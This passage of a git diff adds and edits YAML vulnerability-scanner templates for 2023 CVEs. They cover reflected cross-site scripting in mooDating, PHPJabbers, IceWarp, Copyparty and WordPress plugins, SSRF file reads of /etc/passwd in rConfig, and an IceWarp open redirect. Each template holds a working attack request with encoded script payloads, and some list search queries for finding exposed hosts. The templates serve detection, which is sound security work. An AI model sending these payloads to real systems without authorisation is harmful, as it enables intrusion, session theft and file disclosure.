CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3845 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml new file mode 100644 index 0000000000..1850a020ef --- /dev/null +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-3846 + +info: + name: MooDating 1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3846 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3846 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml new file mode 100644 index 0000000000..6d297ef141 --- /dev/null +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-3847 + +info: + name: MooDating 1.2 - Cross-Site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3847 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3847 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - "{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity" + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, ">","mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml new file mode 100644 index 0000000000..332aad050e --- /dev/null +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-3848 + +info: + name: MooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3848 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3848 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,moodating + +http: + - method: GET + path: + - '{{BaseURL}}/users/viewi1omd">l43yn/108?tab=activity' + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "", "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml new file mode 100644 index 0000000000..0bfef4bbd4 --- /dev/null +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-3849 +info: + name: mooDating 1.2 - Cross-site scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. + reference: + - https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-3849 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3849 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,unauth,moodating + +http: + - method: GET + path: + - '{{BaseURL}}/find-a-matchpksyk">s9a64?' + + matchers: + - type: dsl + dsl: + - 'status_code == 404' + - 'contains(content_type, "text/html")' + - 'contains(body, ">s9a64") && contains(body, "mooDating")' + condition: and diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 150442d8b0..8a58df2fdd 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -1,53 +1,35 @@ id: CVE-2023-38501 info: - name: Copyparty v1.8.6 - Cross-Site Scripting - author: ctflearner + name: CopyParty v1.8.6 - Cross Site Scripting + author: ctflearner,r3Y3r53 severity: medium description: | - Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. The vulnerability in the application's web interface could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. - remediation: Upgrade to the latest version to mitigate this vulnerability. + Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. + remediation: Fixed in v1.8.6 reference: - https://www.exploit-db.com/exploits/51635 - - https://github.com/9001/copyparty/commit/007d948cb982daa05bc6619cd20ee55b7e834c38 - - https://github.com/9001/copyparty/security/advisories/GHSA-f54q-j679-p9hh + - https://github.com/9001/copyparty/releases/tag/v1.8.6 - https://nvd.nist.gov/vuln/detail/CVE-2023-38501 - - http://packetstormsecurity.com/files/173821/Copyparty-1.8.6-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00282 - epss-percentile: 0.64883 - cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: copyparty_project - product: copyparty shodan-query: title:"copyparty" - tags: packetstorm,copyparty,cve,cve2023,xss + tags: cve,cve2023,copyparty,xss,oss http: - method: GET path: - "{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E" - matchers-condition: and matchers: - - type: word - part: body - words: - - '' - - 'go to /' + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "","\">go to")' condition: and - - - type: word - part: header - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml new file mode 100644 index 0000000000..6e1b328c71 --- /dev/null +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -0,0 +1,58 @@ +id: CVE-2023-39108 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39108 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39108 + cwe-id: CWE-918 + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "rConfig" + + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: status + part: header_3 + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml new file mode 100644 index 0000000000..8c72518b8e --- /dev/null +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-39109 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39109 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39109 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.title:"rConfig" + max-request: 1 + tags: cve,cve2023,rconfig,authenticated,ssrf,lfi + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "rConfig" + + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml new file mode 100644 index 0000000000..8cc04670ed --- /dev/null +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-39110 + +info: + name: rConfig 3.9.4 - Server-Side Request Forgery + author: theamanrawat + severity: high + description: | + rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path parameter at /ajaxGetFileByPath.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.4.zip + - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_%20ajaxGetFileByPath.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-39110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-39110 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + - | + GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=file://localhost/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: regex + part: body_3 + regex: + - "root:.*:0:0:" + + - type: word + part: body_1 + words: + - 'rConfig' + + - type: status + part: header_3 + status: + - 200 diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml new file mode 100644 index 0000000000..d1f2cc061c --- /dev/null +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-39700 + +info: + name: IceWarp Mail Server v10.4.5 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-39700 + - https://cwe.mitre.org/data/definitions/79.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-39700 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + shodan-query: http.title:"IceWarp Server Administration" + tags: cve,cve2023,icewarp,xss,unauth + +http: + - raw: + - | + GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, ">") && contains(body, "IceWarp")' + condition: and diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml new file mode 100644 index 0000000000..f62455ae8b --- /dev/null +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-40208 + +info: + name: Stock Ticker <= 3.23.2 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + remediation: Fixed in version 3.23.3 + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stock-ticker/stock-ticker-3233-reflected-cross-site-scripting + - https://patchstack.com/database/vulnerability/stock-ticker/wordpress-stock-ticker-plugin-3-23-3-unauth-reflected-cross-site-scripting-xss-vulnerability + - https://wordpress.org/plugins/stock-ticker/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-40208 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-40208 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=stockticker_load&symbols=MSFT&class=%22+onmousemove%3Dalert%28document.domain%29+ + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "stock_ticker" + - "onmousemove=alert(document.domain)" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml new file mode 100644 index 0000000000..a4bcb1238e --- /dev/null +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -0,0 +1,38 @@ +id: CVE-2023-40779 + +info: + name: IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect + author: r3Y3r53 + severity: medium + description: | + An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL. + reference: + - https://medium.com/@muthumohanprasath.r/open-redirection-vulnerability-on-icewarp-webclient-product-cve-2023-40779-61176503710 + - https://nvd.nist.gov/vuln/detail/CVE-2023-40779 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-40779 + cwe-id: CWE-601 + cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: title:"IceWarp" + tags: cve,cve2023,icewarp,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/%5coast.pro/%2f%2e%2e" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' + + - type: status + status: + - 302 diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml new file mode 100644 index 0000000000..3cde00999e --- /dev/null +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-4110 + +info: + name: PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely. + reference: + - http://packetstormsecurity.com/files/173926/PHPJabbers-Availability-Booking-Calendar-5.0-Cross-Site-Scripting.html + - https://vuldb.com/?id.235957 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4110 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionGetBookingForm&session_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Booking", "Arrival", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml new file mode 100644 index 0000000000..8cd543b774 --- /dev/null +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-4111 + +info: + name: PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely. + reference: + - https://vuldb.com/?id.235958 + - https://packetstormsecurity.com/files/173927/PHPJabbers-Bus-Reservation-System-1.1-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4111 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4111 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=4005&pickup_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&cid=1&view=1&month=7&year=2023&start_dt=&end_dt=&locale=&index=0&session_id=" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "You have an error in your SQL syntax", ">")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml new file mode 100644 index 0000000000..25a6aeab16 --- /dev/null +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-4112 + +info: + name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39750 + - https://cxsecurity.com/ascii/WLB-2023080012 + - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4112 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4112 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"PHP Jabbers.com" + tags: cve,cve2023,xss,unauth,phpjabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1" + + matchers: + - type: dsl + dsl: + - 'contains(body, "PHPJabbers") && contains(body, ">")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml new file mode 100644 index 0000000000..f63f762be8 --- /dev/null +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-4113 + +info: + name: PHPJabbers Service Booking Script 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. + reference: + - http://packetstormsecurity.com/files/173931/PHPJabbers-Service-Booking-Script-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4113 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4113 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,php,jabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Select Service(s)", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml new file mode 100644 index 0000000000..6abdc7f5de --- /dev/null +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-4114 + +info: + name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + reference: + - https://www.exploitalert.com/view-details.html?id=39749 + - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4114 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4114 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,php,jabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Drinks & Extras", "Checkout", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml new file mode 100644 index 0000000000..8565d09920 --- /dev/null +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-4115 + +info: + name: PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://www.exploitalert.com/view-details.html?id=39747 + - https://cxsecurity.com/ascii/WLB-2023080015 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4115 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4115 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Enquiry summary", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml new file mode 100644 index 0000000000..cca1514cb3 --- /dev/null +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -0,0 +1,38 @@ +id: CVE-2023-4116 + +info: + name: PHPJabbers Taxi Booking 2.0 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. + reference: + - https://www.exploitalert.com/view-details.html?id=39746 + - https://cxsecurity.com/ascii/WLB-2023080016 + - http://packetstormsecurity.com/files/173937/PHPJabbers-Taxi-Booking-2.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4116 + - https://vuldb.com/?ctiid.235963 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4116 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: html:"PHP Jabbers.com" + tags: cve,cve2023,xss,phpjabbers + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "Passengers", "Drop-off address", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml new file mode 100644 index 0000000000..2ce7ee44ba --- /dev/null +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-4148 +info: + name: Ditty < 3.1.25 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + remediation: Fixed in version 3.1.25 + reference: + - https://wpscan.com/vulnerability/aa39de78-55b3-4237-84db-6fdf6820c58d + - https://nvd.nist.gov/vuln/detail/CVE-2023-4148 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-4148 + cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/ditty-news-ticker/" + tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=ditty&page=ditty_export&tab=export_ditty&"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(body_2, "") && contains(body_2, "ditty")' + - 'contains(content_type_2, "text/html")' + condition: and diff --git 